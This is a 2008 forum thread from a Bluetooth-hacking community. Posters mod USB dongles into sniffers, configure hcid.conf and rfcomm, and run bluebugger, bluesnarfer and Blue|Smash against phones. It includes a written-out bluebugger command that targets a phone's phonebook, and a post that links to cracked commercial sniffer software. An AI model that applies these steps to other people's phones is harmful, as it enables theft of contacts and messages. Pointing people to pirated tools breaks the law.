was tryin to find the frontline comprobe pack firmware u used in the video drgr33n but havent found they around yet .. u have by any chance a link or somethin ?


.. im runnin BT3beta Live USB install with saves changes on a toshiba satellita A-100
will be really appreciated the help folks ..as my first steps inside the world of Bluetooth..

imported_=Tron=
06-24-2008, 03:38 PM
was tryin to find the frontline comprobe pack firmware u used in the video drgr33n but havent found they around yet .. u have by any chance a link or somethin ?

The only way to legally obtain a copy of the firmware is to actually buy the frontline comprobe. As with every expensive software there are pirated versions of it available on the interweb, but even linking to these could be considered illegal.

daleapearson
06-25-2008, 04:34 PM
Guys,

can any of you guys advise on what method needs to be used to send a txt message, via bluesnarfer or bluebugger.

I assume this is done via an AT command, but any information you guys could share would be much appreciated.

Thanks in advance.
Dale

akamagic
06-26-2008, 06:21 AM
Ok someone correct me if im wrong but basically every phone can be either non-vournable, or vournable to a selected types of attacks ie. bluesnarfer, helomoto, bluesmack etc. this is also based on the types of profiles (ie. object push profile etc.) a phone has. so generally speaking the odds of getting into any given phone and being able, for example, to see there contacts are very low no matter what firmware a dongle has? just wondering since i wanted to know if this was worth the hassle for getting an EXT dongle or if even makes a difference with my current ROM dongle
any feedback is appreciated

DARTIS
06-27-2008, 09:32 AM
My first post here and the reason I logged in was to say the following:

I kindly thank DR_GREEN for the effort to try to help us all with specialised matters on bluetooth (he forced me to look in this matter) but from my experience in this, what he has managed is to disorient every reader of this forum.

There are lots of threads, places around the internet to find this information and the only thing that is done here is to summarise them all with many-many mistakes and wrong things.

There is nowhere explained how exactly he did manage to make this work but has given some information on many un-connected things which in the end do not make sense.

In his example of the frontline modding of a dongle he does not mention that the correct firmware has to be found also and installed. In the first post here he just uses dfutool and shouts that this is all what is needed...
Many posts follow with questions with no answer.

Secondly there is no need to complex things with the mknod files because you can fix whatever rfcomm file you want and then give the service...why to complex channels 3,5,7,.....10 and whatever when you can simply add 3 rfcomm devices 1,2,3 then give them respectively a service and channel.

For example:
mknod –m 666 /dev/rfcomm1 c 216 1
mknod –m 666 /dev/rfcomm2 c 216 2
mknod –m 666 /dev/rfcomm3 c 216 3

sdptool add --channel=1 DUN
sdptool add --channel=2 OPUSH
sdptool add --channel=3 FTP

rfcomm bind 1 [….MAC] 3
rfcomm bind 2 [….MAC] 6
rfcomm bind 3 [….MAC] 7


Afterwards you connect/bind with rfcomm the device 1 with the respective channel of the phone which has the same service..this shows some luck of knowledge.

A lot could be said.

The famous video which is showing how the work is done connects the MAC of the sniffer and not of a phone...you hack with the sniffer but not showing how all this is prepared in the first place.

The blue|smash 2.0 application is completely broken and not ready to be on BackTrack 3.
I modded it just to begin (It does not work at all!) and then later the db. files are all messed up. I have given up because I lacked the time.

It should not have been inserted if not ready.

The BlueISmash 1.0 was better and worked OK but it can not hack anything unless there is proper information of what to do exactly.

There is the software "BlueDiving" which is written in Perl and I recommend everybody to look at it... I fear there is a conflict between BlueSmash and BlueDiving because they do the same thing only to find out that the Perl is antagonizing a Python script...who has written it first I am unsure.

I am sorry for the harsh words. I believe this thread needs a lot more contriubution and it is obvious that a lot of readers are discouraged due to lack of proper information. I will try to create a proper tutorial when I manage to do so.

PS. I have the experience to have an Internet Modding work with hundreds of thousands downloads (Later I may reveal myself). I believe to the proper information and the proper handling of the readers of it.

So for the sake of this community, we have to give a proper tutorial in this matter and not XXXXX.

akamagic
06-27-2008, 06:33 PM
Well you seem to make sense since the whole bluetooth coverage really isn't "proper" and introduced here so much, although you do come off a little harsh since dr green has done a great amount of contribution to this matter and is willing to help those who need help, but yes i do agree there should be revisions to make a more "complete" tutorial. I admit i was a little discouraged since i had so many questions about this matter. but than again questions lead to interest, (for me at least) so i have done a good amount of research in the past few days but still have questions, so your tutorial would be more than welcomed

PS: you mentioned there were "lots" of threads on this, however i really don't believe this is true. But there is guide on how to upgrade your firmware which comes with the frontline comprobe pack (even though it doesn't mention u need a compatible EXT dongle but thats besides the point).But my point is we do need a tutorial were bluetooth is covered in good detail all in one thread/site which was the concept of dr greens tutorial. But again more does need to be added and don't get me wrong its obvious dr green has a vast amount of knowledge in bluetooth, but writing a "complete" tutorial isn't the easiest thing do.

DARTIS
06-27-2008, 06:51 PM
@akamagic:

Yes ..I am a bit harsh. I did not want to sound unthankful but I managed to do so...

Indeed, he has contributed a lot as I can trace.
But still I believe that at the time he wrote these lines he was more enthusiastic than in knowledge.

Bluetooth hacking cannot be done in Bluetooth 2.0 without sniffer...forget about it.

Sniffer creation tutorial...

A lot better is one here:
nfodb.com/view_231041_Frontline-Bluetooth-Sniffer-v5.6.9.0-Cracked-.html[/url]

-EDIT-

Add h t t p : / / to the above link... I am new poster and do not let me to post links yet... so I torrented them :)

akamagic
06-29-2008, 12:25 AM
@ DARTIS

Lol yeah thats the guide i was talking about that comes with the frontline comprobe pack but even with that tut it is easy to run into problems, and even if we finally have a sniffer than what (ie. where do we get started into actually hacking)...which is what i meant by a complete bluetooth hacking tutorial with F.A.Q's which would solve alot of problems/confusion and lead to more success but yeah thanx for the link even though everyone still needs the .dfu firmware unless they have it already which would mean they have that tut already.

DARTIS
06-29-2008, 02:45 PM
@akamagic

I have seen also a lot people having problem to issue a simple handshaking between their laptop and cellphones.

I will write a few comments to help before a total Tutorial


1st Step
Go to
/etc/Bluetooth/passkeys/default
Issue there 0000 or 1234 as the PIN of your laptop

Make it executable


2nd Step
Go to
/etc/Bluetooth/hci.conf

Change the following:


#
# HCI daemon configuration file.
#

# HCId options
options {
# Automatically initialize new devices
autoinit yes;

# Security Manager mode
# none - Security manager disabled
# auto - Use local PIN for incoming connections
# user - Always ask user for a PIN
#
security auto; #or else the authentication will not work

# Pairing mode
# none - Pairing disabled
# multi - Allow pairing with already paired devices
# once - Pair once and deny successive attempts
pairing multi; #or else the authentication will not work

# Default PIN code for incoming connections
passkey "0000"; #or 1234, ...=The PIN which gives to the cellphone ...if we are lucky!

# Default settings for HCI devices
device {
# Local device name
# %d - device id
# %h - host name
name "DARTIS or YOUR name :)";
# Local device class
class 0x000240;#Disguise your laptop as a simple cellphone. Put the exact class of the cellphone you want to connect for maybe better results...learn it by hcitool inq

# Default packet type
#pkt_type DH1,DM1,HV1;
pkt_type DH1,DM1,HV1; #Optional

# Inquiry and Page scan
#iscan enable;
pscan enable;
iscan enable; #(Important for better communication between BTs)

# Default link mode
# none - no specific policy
# accept - always accept incoming connections
# master - become master on incoming connections,
# deny role switch on outgoing connections
lm accept,master; #Very important for the sniffer business..

# Default link policy
# none - no specific policy
# rswitch - allow role switch
# hold - allow hold mode
# sniff - allow sniff mode
# park - allow park mode
lp rswitch,hold,sniff,park; #rswitch can be disabled if you use master mode

auth enable; #Very important for the pairing process
encrypt enable; #Very important for the sniffing process
}

Make it executable


3rd Step

Fire up your hci's seperately

hciconfig hci0 up
hciconfig hci1 up
etc...


4th Step

Put in your console the command

bash /etc/rc.d/rc.bluetooth restart

Check = OK with hciconfig -a
You should be able to proceed ...

Will revert with more

@those who had problems pairing
I would appreciate the feedback for anymore of your problems in that matter.

akamagic
06-29-2008, 10:45 PM
Thats basically my procedure to get them paired but nice start although i don't understand whats the purpose to make the passkey or .conf file to be executable?

imported_ASTRAPI
07-02-2008, 05:37 PM
Hi

I start with the first post and the most are working great untill the phone asks for a key to pair and never pair so i can't get any info from the phone.

So i follow the steps to add raw mode in my Fujitsu Siemens V2.0 Bluetooth and it was all ok according to post #2 and i verify all codes.

Then i use:
hciconfig hci0 up (all ok)
hciconfig -a (i get this info)

BD address: bla bla
up running RAW
rx bla bla
tx bla bla

And nothing else (before i was have more info there.

then i use :
hcitool scan hci0

i get this:

device is not avaliable: No such device

also my blue info:
hciconfig hci* revision

Bd address bla bla
hci 19.2
chip version: bluecore4 External
max key size: 56bit
sco mapping HCI

Any help please?

Thanks

akamagic
07-02-2008, 09:23 PM
Hi

I start with the first post and the most are working great untill the phone asks for a key to pair and never pair so i can't get any info from the phone.

So i follow the steps to add raw mode in my Fujitsu Siemens V2.0 Bluetooth and it was all ok according to post #2 and i verify all codes.

Then i use:
hciconfig hci0 up (all ok)
hciconfig -a (i get this info)

BD address: bla bla
up running RAW
rx bla bla
tx bla bla

And nothing else (before i was have more info there.

then i use :
hcitool scan hci0

i get this:

device is not avaliable: No such device

also my blue info:
hciconfig hci* revision

Bd address bla bla
hci 19.2
chip version: bluecore4 External
max key size: 56bit
sco mapping HCI

Any help please?

Thanks

I'm assuming you didn't upgrade using the *.dfu file which is contained in the frontline comprobe pack. (look at drgreen's vid.)

imported_ASTRAPI
07-03-2008, 06:51 AM
I did it but i have the same result :(

As you can see in the video Raw mode is good and is what we want but afer that i can't scan using:


hcitool scan hci0

So i can found any devices to try all the rest commands.

ColForbin
07-06-2008, 09:56 PM
"what he has managed is to disorient every reader of this forum."

Apologies DARTIS, but I beg to differ sir. I believe that if anyone has been disoriented, it would be the non-readers. Non-readers, being those who want the quick and the easy.

Dr_GrEeN has been nothing but helpful in my experience. If one were to read his posts and follow them explicitly, one would find success.

I followed Dr_GrEen's tutorial on how to modify a USB bluetooth adapter into a sniffing tool, and succeeded on the first try.

The key to success? Reading. I first wanted to know what adapter would work. After searching through the forums, I found that the adapter I wanted to try was a D-Link DBT-120 rev. C.

I bought two and modified one. This is not a rip on DARTIS. This is simply a call to all, to read. Read the entire forum. If you can't find the answer to a question, register and ask.

Furthermore, this a shout out to Dr_GrEeN. The man codes blue-smash, creates detailed tutorials and videos, and is getting it all straight as he goes. Give the man some credit, why don'tcha.

akamagic
07-07-2008, 01:49 PM
I did it but i have the same result :(

As you can see in the video Raw mode is good and is what we want but afer that i can't scan using:



So i can found any devices to try all the rest commands.

well that is because now you have a working sniffer and in the video of cracking the pin number for a bluetooth compatible phone drgreen uses two bluetooth dongles (one sniffer, and one unmodified one for scanning) but i could be wrong as i have much more to learn but most likely you basically need another dongle for scanning.

jrm7262
07-09-2008, 08:06 AM
Have read all the posts, great information, thank you all.

Just wanted to subscribe to the thread.

One question, to actually implement any of the exploits are two
dongles needed?

Also looking at all the links the one dongle that seems the most probable is the D-Link DBT-120 Rev C1 (Now when I find a supply, do I buy 1 or 2, lol)

Kindest regards

James

DARTIS
07-09-2008, 01:13 PM
@akamagic
The executable as I remember is important for the default file or else there are pairing problems.
To be sure make them executable.

Can anyone confirm this?

@ASTRAPI:

You cannot pair a sniffer.
You cannot sniff without the firmware. The first post describes how to change the hardware but not how to upgrade the firmware which if you have done it whatsoever you should be able to be in RAW mode as I see.

@ColForbin

You are more than right. In fact I stated in previous post that I managed to be harsh without having this intention. I got in this subject by reading the posts of DrGreen and he is more than helpful as you say.

I know by my own experience that the lack of time makes difficult to update and share information promptly and 100% correctly. And obviously this is the case here.

Although it is summer I will try to contribute more in this subject or else... from September.
I bet DrGreen will produce smthg in the meantime. Or else someone else or even me will catch him up.

In any case... the forum needs contribution and I hope it will be shared.

akamagic
07-09-2008, 02:11 PM
@DARTIS

I don't believe it is necessary to make them executable as for me it works either way, but guess it wouldn't hurt

@jrm7262

Its really up to you since you could still scan phones and use simple attacks such as bluebugger and bluesnarfer (depending on the phone) with one unmodified dongle. But of course it would be better to have two dongles. One as a sniffer (in raw mode) and the other unmodified (for scanning and such) as being able to sniff is where the exploits really begin.

ps: The DBT-120 is what i use as my sniffer and i have another cheap dongle for scanning and pairing

drgr33n
07-10-2008, 03:24 AM
aggtrfrad / sws2007

Can you sen me all the info in a PM please with all the output messages from bccmd etc.

akamagic

Once a dongle has been modified it cannot perform scan tasks ETC because the source code you are using do not contain the right op codes and haven't been coded in Not yet ;)

johnjohnsp1

dbt-122 has a broadcom chipset and doesn't work

daleapearson

Yes you are on the right path, I have alot to catch up on so if you are stuck, post back and I will help out more.

ASTRAPI

Again once a dongle has been modified it cannot perform scan tasks ETC because the source code you are using do not contain the right op codes and haven't been coded in.

DARTIS

Harsh words man ! There are a hundred ways to skin a cat !!!!!!!! For EG:


For example:
mknod –m 666 /dev/rfcomm1 c 216 1
mknod –m 666 /dev/rfcomm2 c 216 2
mknod –m 666 /dev/rfcomm3 c 216 3

sdptool add --channel=1 DUN
sdptool add --channel=2 OPUSH
sdptool add --channel=3 FTP

rfcomm bind 1 [….MAC] 3
rfcomm bind 2 [….MAC] 6
rfcomm bind 3 [….MAC] 7


Afterwards you connect/bind with rfcomm the device 1 with the respective channel of the phone which has the same service..this shows some luck of knowledge.

Why not use mknod ?

Blue|Smash v2.0 was a mix up that I'm looking into. It IS 100% functional! If I've missed anybody or anything out post again as I'm back for a while now ;) As for the people asking for the frontline firmware can I just point out that is is illegal to obtain a copy without buying it ! I am not prepared to offer any assistance in getting a copy.

jrm7262
07-13-2008, 12:27 PM
Hi All,

When upgrading the firmware of the usb bluetooth dongle (in my case D-Link DBT 120), does it matter which version to upgrade with?

I read through a lot of posts and versions are mentioned from 47 to 52.
(There was one comment that version 5 bricks the dongle).

Any advice appreciated, I'd like not to brick the dongle on my first attempt, just because I used the wrong version of the firmware.


Kindest regards

James

DARTIS
07-14-2008, 04:04 PM
@Dr_GrEeN:

God...sorry. I know I was but it was an explosion of thoughts not really deserving to be used all together against you.


Why not use mknod ?

hmmm...sorry cannot understand.
I just state a more straightforward technique for rfcomm bindings

I hope Bluesmash 2.0 will get fully functional because the DB and pygame commands are buggy.

All the other are functional as they seem but cannot work due to the link with the above mentioned bugs.

@jrm7262:

Use only airsnifferdev47bc2.dfu
or 47 if you prefer.

aggtrfrad
07-21-2008, 07:00 PM
-a7eng eb502 uses bluecore2-ext chip. not bluecore4. Frontline has written a couple of firmware files for different devices including bluecore2/3/4 chips. Frontline firmware files look like that: Airsnifferdev??bc?.dfu
first two ? is version of the firmware, third ? is chipset version it is intended for.
That means airsnifferdev57bc4 won't work (not even load) to a a7eng-eb502 dongle using bluecore2. airsnifferdev??bc2 uploads to the dongle successfully, BUT the dongle fails verification tests, and never comes back to normal state, it stays in dfu mode (devid is ffff and it only accepts dfu commands, not bccmd commands, and its not an hci device anymore).

-When downloading the original firmware from your a7eng-eb502 dongle to your pc, something goes wrong and the firmware file is corrupted. not sure why but it is. That means that if you upload the wrong firmware to your dongle, it's not coming back by re-uploading your back up, it's corrupted.
I have tried several versions of firmware for csr, to bring my dongle back from dfu mode, but none worked.

-bccmd works perfect for this dongle, but with no new firmware, nothing done.

-The only way to bring this dongle back from dfu more, is to upload the factory firmware, that is the only one it will ever accept (i hope i'm wrong cause i spent 80$ after reading it can be a sniffer). This file is not available to the public, I got it after begging a developer from a7eng for help, and sending all my order information to him.

p.s. I have tried airsnifferdev46/47bc2. If you have older or newer versions (for bc2 always) pls pm me. Maybe we are lucky. Also, if anyone's into dfu protocol, pls pm me. I read that there are some security keys between firmware files and csr chipsets, maybe that's the reason the dongle only accepts the factory firmware.
Here's a bccmd pslist output, for the record...

0x0001 - Bluetooth address (8 bytes)
0x001e - Radio power table (40 bytes)
0x0021 - Default transmit power (2 bytes)
0x002d - Maximum transmit power when peer has no RSSI (2 bytes)
0x015e - DFU encryption VM application public key MSB (64 bytes)
0x015f - DFU encryption VM application public key LSB (64 bytes)
0x0160 - DFU encryption VM application M dash (2 bytes)
0x0161 - DFU encryption VM application public key R2N MSB (64 bytes)
0x0162 - DFU encryption VM application public key R2N LSB (64 bytes)
0x01be - UART Baud rate (2 bytes)
0x01c2 - UART configuration when under VM control (2 bytes)
0x01f6 - Crystal frequency trim (2 bytes)
0x01f9 - Host interface (2 bytes)
0x01fc - Enable host query task? (2 bytes)
0x0209 - TX and RX PIO control (2 bytes)
0x0259 - Module serial number (4 bytes)
0x025a - Module design ID (2 bytes)
0x025c - Module security code (16 bytes)
0x0267 - Module manufactuer data 9 (16 bytes)
0x02b4 - User configuration data 42 (32 bytes)
0x02c2 - USB product string (56 bytes)
0x02c3 - USB serial number string (40 bytes)
0x03cc - HCI traffic routed internally (2 bytes)
0x03cd - Initial device bootmode (2 bytes)
0x04b0 - Unknown (10 bytes)
0x04b8 - Unknown (2 bytes)
0x04b9 - Unknown (2 bytes)
0x04ba - Unknown (2 bytes)
0x04bb - Unknown (2 bytes)
0x04bc - Unknown (2 bytes)
0x6001 - Unknown (128 bytes)

BigMac
07-21-2008, 11:55 PM
Dr_Green i wanted to ask you if you tried carwhisperer yet?

I installed it the other night and tested it with my usb dongle but i dont have a bluetooth phone or head set... I tested the tools out and it seems vary simple...

williamc
07-23-2008, 01:19 PM
Trying out your findings. Here's what I've found and where I'm stuck:

I have three Bluetooth adaptors. One is internal to the laptop (hci0), one is my Dlink sniffer (hci1), and one is my Linksys BT100 (hci2).

hci0: Type: USB
BD Address: 00:1E:37:5A:F4:5B ACL MTU: 310:10 SCO MTU: 64:8
UP RUNNING PSCAN
RX bytes:24562 acl:113 sco:0 events:656 errors:0
TX bytes:8863 acl:119 sco:0 commands:289 errors:0

hci1: Type: USB
BD Address: 00:17:9A:2B:86:11 ACL MTU: 0:0 SCO MTU: 0:0
UP RUNNING RAW
RX bytes:186 acl:0 sco:0 events:0 errors:0
TX bytes:129 acl:0 sco:0 commands:18 errors:0

hci2: Type: USB
BD Address: 00:18:F8:89:8F:34 ACL MTU: 377:10 SCO MTU: 64:8
UP RUNNING PSCAN
RX bytes:21417 acl:89 sco:0 events:482 errors:0
TX bytes:7920 acl:95 sco:0 commands:244 errors:0


I followed your original posts to configure the devices. Now, I'm working on your video for sniffing with Bluesmash. I get to this point and appear to have an error:

Enter device name eg hci0.....: hci1
Use Timer ? y/n: y
Use Filter ? y/n: n
Ignore packet type? y/n: n
Ignore zero length packets? y/n: y
Own pin? y/n: y
Scanning for devices.......
Blue|Smash found 00:1C:43:81:27:BC - SGH-A707
Enter the Master's MAC....:00:1E:37:5A:F4:5B
Enter the Slaves's MAC....:00:1C:43:81:27:BC
csr_sniffer: hci_send_req(): Connection timed out
csr_sniffer: hci_send_req(): Connection timed out
Launching Sniffer :p
hcidump's log will be stored in 00:1E:37:5A:F4:5B@00:1C:43:81:27:BC.cap

Continuing on, I get errors:

bt ~ # attest 00:1C:43:81:27:BC 3
Connecting to 00:1C:43:81:27:BC on channel 3
Can't connect: Permission denied (13)

Log file is empty too. Any ideas? Thanks!

William

arisdim
08-19-2008, 06:45 AM
Can someone explain to me why i get "Cannot open '/dev/rfcomm0': Connection refused" message at the end?


bt ~ # hciconfig hci0 up
bt ~ # hciconfig -a
hci0: Type: USB
BD Address: AA:AA:AA:AA:AA:AA ACL MTU: 678:8 SCO MTU: 48:10
UP RUNNING
RX bytes:85 acl:0 sco:0 events:9 errors:0
TX bytes:33 acl:0 sco:0 commands:9 errors:0
Features: 0xbf 0xfe 0x8d 0x78 0x08 0x18 0x00 0x00
Packet type: DM1 DM3 DM5 DH1 DH3 DH5 HV1 HV2 HV3
Link policy:
Link mode: SLAVE ACCEPT
Name: 'ISSCBTA'
Class: 0x000000
Service Classes: Unspecified
Device Class: Miscellaneous,
HCI Ver: 1.2 (0x2) HCI Rev: 0x1fe LMP Ver: 1.2 (0x2) LMP Subver: 0x1fe
Manufacturer: Integrated System Solution Corp. (57)

bt ~ # hcitool scan hci0
Scanning ...
00:11:22:33:44:55 K750i
bt ~ # sdptool browse 00:11:22:33:44:55
Browsing 00:11:22:33:44:55 ...
Service Description: Sony Ericsson K750
Service RecHandle: 0x10000
Service Class ID List:
"PnP Information" (0x1200)

Service Name: Dial-up Networking
Service RecHandle: 0x10001
Service Class ID List:
"Dialup Networking" (0x1103)
"Generic Networking" (0x1201)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 1
Profile Descriptor List:
"Dialup Networking" (0x1103)
Version: 0x0100

Service Name: Serial Port
Service RecHandle: 0x10002
Service Class ID List:
"Serial Port" (0x1101)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 2

Service Name: HF Voice Gateway
Service RecHandle: 0x10003
Service Class ID List:
"Handfree Audio Gateway" (0x111f)
"Generic Audio" (0x1203)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 3
Profile Descriptor List:
"Handsfree" (0x111e)
Version: 0x0101

Service Name: HS Voice Gateway
Service RecHandle: 0x10004
Service Class ID List:
"Headset Audio Gateway" (0x1112)
"Generic Audio" (0x1203)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 4
Profile Descriptor List:
"Headset" (0x1108)
Version: 0x0100

Service Name: OBEX Object Push
Service RecHandle: 0x10005
Service Class ID List:
"OBEX Object Push" (0x1105)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 5
"OBEX" (0x0008)
Profile Descriptor List:
"OBEX Object Push" (0x1105)
Version: 0x0100

Service Name: OBEX File Transfer
Service RecHandle: 0x10006
Service Class ID List:
"OBEX File Transfer" (0x1106)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 6
"OBEX" (0x0008)
Profile Descriptor List:
"OBEX File Transfer" (0x1106)
Version: 0x0100

Service Name: OBEX SyncML Client
Service RecHandle: 0x10007
Service Class ID List:
UUID 128: 00000002-0000-1000-8000-0002ee000002
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 7
"OBEX" (0x0008)

Service Name: OBEX IrMC Sync Server
Service RecHandle: 0x10008
Service Class ID List:
"IrMC Sync" (0x1104)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 8
"OBEX" (0x0008)
Profile Descriptor List:
"IrMC Sync" (0x1104)
Version: 0x0100

Service Name: Mouse & Keyboard
Service Description: Remote Control
Service Provider: Sony Ericsson
Service RecHandle: 0x10009
Service Class ID List:
"Human Interface Device" (0x1124)
Protocol Descriptor List:
"L2CAP" (0x0100)
PSM: 17
"HIDP" (0x0011)
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"Human Interface Device" (0x1124)
Version: 0x0100

bt ~ # bash /etc/rc.d/rc.bluetooth restart
Stopping Bluetooth subsystem: pand dund rfcomm hidd sdpd hcid.
Starting Bluetooth subsystem: hcid passkeys.
bt ~ # mknod -m 666 /dev/rfcomm0 c 216 1
bt ~ # mknod -m 666 /dev/rfcomm1 c 216 6
bt ~ # mknod -m 666 /dev/rfcomm2 c 216 5
bt ~ # sdptool add --channel=1 DUN
bt ~ # sdptool add --channel=6 FTP
bt ~ # sdptool add --channel=5 OPUSH
bt ~ # hcitool scan hci0
Scanning ...
00:11:22:33:44:55 K750i
bt ~ # bluebugger -m as -a 00:11:22:33:44:55 phonebook

bluebugger 0.1 ( MaJoMu | w ww.codito.de )
-----------------------------------------

Target Device: '00:11:22:33:44:55'
Target Name: 'K750i'

Cannot open '/dev/rfcomm0': Connection refused


I have changed the /etc/bluetooth/hcid.conf with that:

#
# HCI daemon configuration file.
#

# HCId options
options {
# Automatically initialize new devices
autoinit yes;

# Security Manager mode
# none - Security manager disabled
# auto - Use local PIN for incoming connections
# user - Always ask user for a PIN
#
security auto;

# Pairing mode
# none - Pairing disabled
# multi - Allow pairing with already paired devices
# once - Pair once and deny successive attempts
pairing multi;

# Default PIN code for incoming connections
passkey "1234";
}

# Default settings for HCI devices
device {
# Local device name
# %d - device id
# %h - host name
name "device1";

# Local device class
class 0x000000;

# Default packet type
#pkt_type DH1,DM1,HV1;

# Inquiry and Page scan
iscan enable; pscan enable;

# Default link mode
# none - no specific policy
# accept - always accept incoming connections
# master - become master on incoming connections,
# deny role switch on outgoing connections
lm accept,master;

# Default link policy
# none - no specific policy
# rswitch - allow role switch
# hold - allow hold mode
# sniff - allow sniff mode
# park - allow park mode
lp rswitch,hold,sniff,park;
auth enable;
encrypt enable;
}

mahabad1972
08-21-2008, 12:58 PM
hi i was trying to do bluetooth hack my own phone but when i get to this part that you put in etc/bluetooth/hcid.conf it said permetion denied can you tell me why


bt ~ # hciconfig hci0 up
bt ~ # hciconfig -a
hci0: Type: USB
BD Address: 00:1C:26:E1:FB:60 ACL MTU: 1017:8 SCO MTU: 64:1
UP RUNNING PSCAN
RX bytes:3610 acl:11 sco:0 events:72 errors:0
TX bytes:558 acl:7 sco:0 commands:29 errors:0
Features: 0xff 0xff 0x8f 0xfe 0x9b 0xf9 0x00 0x80
Packet type: DM1 DM3 DM5 DH1 DH3 DH5 HV1 HV2 HV3
Link policy: RSWITCH HOLD SNIFF PARK
Link mode: SLAVE ACCEPT
Name: 'backtrack (0)'
Class: 0x84010c
Service Classes: Rendering, Information
Device Class: Computer, Laptop
HCI Ver: 2.0 (0x3) HCI Rev: 0x213b LMP Ver: 2.0 (0x3) LMP Subver: 0x41d3
Manufacturer: Broadcom Corporation (15)

bt ~ # hcitool scan hci0
Scanning ...
00:1B:EE:39:E6:2E Trixiesmom
00:1E:E2:30:72:F9 John. Is awesome.
00:1F:00:B4:0C:39 Mahabad jino
bt ~ # sdptool browse 00:1F:00:B4:0C:39
Browsing 00:1F:00:B4:0C:39 ...
Service Name: AVRCP Target
Service Description: Audio Video Remote Control
Service Provider: Symbian Software Ltd.
Service RecHandle: 0x10000
Service Class ID List:
"AV Remote Target" (0x110c)
Protocol Descriptor List:
"L2CAP" (0x0100)
PSM: 23
"AVCTP" (0x0017)
uint16: 0x100
Profile Descriptor List:
"AV Remote" (0x110e)
Version: 0x0100

Service RecHandle: 0x10001
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 1

Service Name: Dial-Up Networking
Service RecHandle: 0x10002
Service Class ID List:
"Dialup Networking" (0x1103)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 2
Language Base Attr List:
code_ISO639: 0x454e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"Dialup Networking" (0x1103)
Version: 0x0100

Service Name: OBEX Object Push
Service RecHandle: 0x10003
Service Class ID List:
"OBEX Object Push" (0x1105)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 9
"OBEX" (0x0008)
Language Base Attr List:
code_ISO639: 0x454e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"OBEX Object Push" (0x1105)
Version: 0x0100

Service Name: Imaging
Service RecHandle: 0x10005
Service Class ID List:
"Imaging Responder" (0x111b)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 15
"OBEX" (0x0008)
Language Base Attr List:
code_ISO639: 0x454e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"Imaging" (0x111a)
Version: 0x0100

Service Name: Audio Source
Service RecHandle: 0x10007
Service Class ID List:
"Audio Source" (0x110a)
Protocol Descriptor List:
"L2CAP" (0x0100)
PSM: 25
"AVDTP" (0x0019)
uint16: 0x100
Language Base Attr List:
code_ISO639: 0x454e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"Advanced Audio" (0x110d)
Version: 0x0100

Service Name: Hands-Free Audio Gateway
Service RecHandle: 0x10008
Service Class ID List:
"Handfree Audio Gateway" (0x111f)
"Generic Audio" (0x1203)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 3
Language Base Attr List:
code_ISO639: 0x454e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"Handsfree" (0x111e)
Version: 0x0105

Service Name: Headset Audio Gateway
Service RecHandle: 0x10009
Service Class ID List:
"Headset Audio Gateway" (0x1112)
"Generic Audio" (0x1203)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 4
Language Base Attr List:
code_ISO639: 0x454e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"Headset" (0x1108)
Version: 0x0100

Service Name: SyncMLClient
Service RecHandle: 0x1000b
Service Class ID List:
UUID 128: 00000002-0000-1000-8000-0002ee000002
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 10
"OBEX" (0x0008)
Language Base Attr List:
code_ISO639: 0x454e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"" (0x00000002-0000-1000-8000-0002ee000002)
Version: 0x0100

Service Name: OBEX File Transfer
Service RecHandle: 0x1000c
Service Class ID List:
"OBEX File Transfer" (0x1106)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 11
"OBEX" (0x0008)
Language Base Attr List:
code_ISO639: 0x454e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"OBEX File Transfer" (0x1106)
Version: 0x0100

Service Name: Nokia OBEX PC Suite Services
Service RecHandle: 0x1000d
Service Class ID List:
UUID 128: 00005005-0000-1000-8000-0002ee000001
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 12
"OBEX" (0x0008)
Language Base Attr List:
code_ISO639: 0x454e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"" (0x00005005-0000-1000-8000-0002ee000001)
Version: 0x0100

Service Name: SyncML DM Client
Service RecHandle: 0x1000e
Service Class ID List:
UUID 128: 00000004-0000-1000-8000-0002ee000002
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 13
"OBEX" (0x0008)
Language Base Attr List:
code_ISO639: 0x454e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"" (0x00000004-0000-1000-8000-0002ee000002)
Version: 0x0100

Service Name: Nokia SyncML Server
Service RecHandle: 0x10010
Service Class ID List:
UUID 128: 00005601-0000-1000-8000-0002ee000001
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 14
"OBEX" (0x0008)
Language Base Attr List:
code_ISO639: 0x454e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"" (0x00005601-0000-1000-8000-0002ee000001)
